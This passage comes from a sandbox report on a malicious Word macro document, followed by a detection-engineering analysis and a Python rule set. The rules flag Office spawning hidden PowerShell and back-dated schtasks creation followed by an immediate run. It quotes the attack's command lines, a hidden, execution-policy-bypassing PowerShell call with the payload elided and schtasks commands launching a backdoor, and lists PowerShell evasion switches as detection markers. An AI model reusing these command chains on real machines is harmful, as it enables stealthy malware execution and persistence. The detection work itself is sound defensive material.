MD5:— | SHA256:— | |||
3712 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC870.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3712 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFC1CD2B05518FA9BD.TMP | — | |
MD5:— | SHA256:— | |||
3712 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF59703CA31D781D20.TMP | — | |
MD5:— | SHA256:— | |||
3712 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\msoDBCA.tmp | — | |
MD5:— | SHA256:— | |||
3712 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF3C5714AC1E812F7F.TMP | — | |
MD5:— | SHA256:— |
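What the process tree gives a detection engineer is a chain rather than a hash: WINWORD.EXE spawns `powershell.exe -W Hidden -Exec Bypass` with an inline `FromBase64String`, that PowerShell spawns `schtasks /create /SC ONCE /TN Troj /TR <desktop path> /ST 14:13 /F` (the `/ST` value is `(Get-Date).AddMinutes(-2)`, so the one-shot task is created with a start time already in the past), and then `schtasks /run /TN Troj`. The `New-ScheduledTaskSettingsSet` and `Set-ScheduledTask` calls in between belong to the ScheduledTasks module that ships with Windows 8/Server 2012 and later, so on this Windows 7 image they fail and only `schtasks /run` starts the payload; PowerShell's `-Command` exit status reflects just the last statement, the successful `schtasks /run`, which is why the table shows exit code 0 for PID 2476 as well.

The code below is added example detection logic, not from the report or from any product, that runs those rules over process-creation records. `EVENTS` is constructed to mirror the table above: PIDs, images and command lines follow the report, the timestamps are assumed (the report gives only the analysis start), and the base64 blob is elided.

```python
"""Behavioural rules over process-creation events for the chain in the report:
Office -> hidden/bypass PowerShell -> schtasks /create (ONCE, back-dated,
action under a user-writable path) -> schtasks /run. Added example; not part
of the sandbox report."""
import re
from datetime import datetime, timedelta

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_MARKERS = ("-w hidden", "-windowstyle hidden", "-exec bypass",
                      "-executionpolicy bypass", "frombase64string", "-encodedcommand", "-enc ")
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\")

# Constructed events modelled on the process table (timestamps assumed,
# WINWORD's parent PID unknown, base64 blob replaced by '...').
EVENTS = [
    {"ts": datetime(2020, 10, 20, 14, 14, 50), "pid": 3712, "ppid": None,
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\RS4_WinATP-Intro-Invoice.docm"'},
    {"ts": datetime(2020, 10, 20, 14, 15, 2), "pid": 2476, "ppid": 3712,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden -Exec Bypass -Command cd /;$fileBase64Prefix = ...;$file= [Convert]::FromBase64String([string]$fileBase64);schtasks /run /TN Troj'},
    {"ts": datetime(2020, 10, 20, 14, 15, 5), "pid": 2336, "ppid": 2476,
     "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'"C:\Windows\system32\schtasks.exe" /create /SC ONCE /TN Troj /TR C:\Users\admin\Desktop\WinATP-Intro-Backdoor.exe /ST 14:13 /F'},
    {"ts": datetime(2020, 10, 20, 14, 15, 7), "pid": 3312, "ppid": 2476,
     "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'"C:\Windows\system32\schtasks.exe" /run /TN Troj'},
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def switch_value(cmdline, switch):
    """Value following a schtasks switch such as /TN or /ST (quoted or bare)."""
    m = re.search(r'/%s\s+("[^"]*"|\S+)' % switch, cmdline, re.IGNORECASE)
    return m.group(1).strip('"') if m else None


def is_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def evaluate(events, run_window=timedelta(minutes=5)):
    """Return (rule, pid) tuples for every event that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        parent_img = image_name(parent["image"]) if parent else ""
        img = image_name(e["image"])
        cmd = e["cmdline"].lower()

        # Rule 1: Office application spawning PowerShell with a hidden window,
        # policy bypass or inline decoding.
        if img == "powershell.exe" and parent_img in OFFICE_APPS and any(m in cmd for m in POWERSHELL_MARKERS):
            findings.append(("office_spawned_hidden_powershell", e["pid"]))

        if img == "schtasks.exe" and "/create" in cmd:
            task = switch_value(e["cmdline"], "TN")
            action = switch_value(e["cmdline"], "TR")
            sched = (switch_value(e["cmdline"], "SC") or "").upper()
            start = switch_value(e["cmdline"], "ST")

            # Rule 2: the task action lives in a user-writable location.
            if action and is_user_writable(action):
                findings.append(("schtasks_action_in_user_writable_path", e["pid"]))

            # Rule 3: a one-shot task whose start time is already past at creation
            # only makes sense if the creator intends to trigger it by hand.
            if sched == "ONCE" and start and re.fullmatch(r"\d{1,2}:\d{2}", start):
                hh, mm = map(int, start.split(":"))
                if e["ts"].replace(hour=hh, minute=mm, second=0, microsecond=0) <= e["ts"]:
                    findings.append(("schtasks_once_backdated_start", e["pid"]))

            # Rule 4: the same parent runs the task on demand shortly after creating it.
            for r in events:
                if (image_name(r["image"]) == "schtasks.exe" and "/run" in r["cmdline"].lower()
                        and switch_value(r["cmdline"], "TN") == task and r["ppid"] == e["ppid"]
                        and timedelta(0) <= r["ts"] - e["ts"] <= run_window):
                    findings.append(("schtasks_create_then_run", r["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{pid}: {rule}")
```

Rules 2 to 4 are deliberately wider than this sample (any `/TR` under `\Users\`, `\AppData\`, `\ProgramData\` or a temp directory; any `ONCE` task back-dated at creation; any create-then-run pair from one parent), since the task name, file name and desktop path are trivially changed while the create-then-run pattern is what the technique needs.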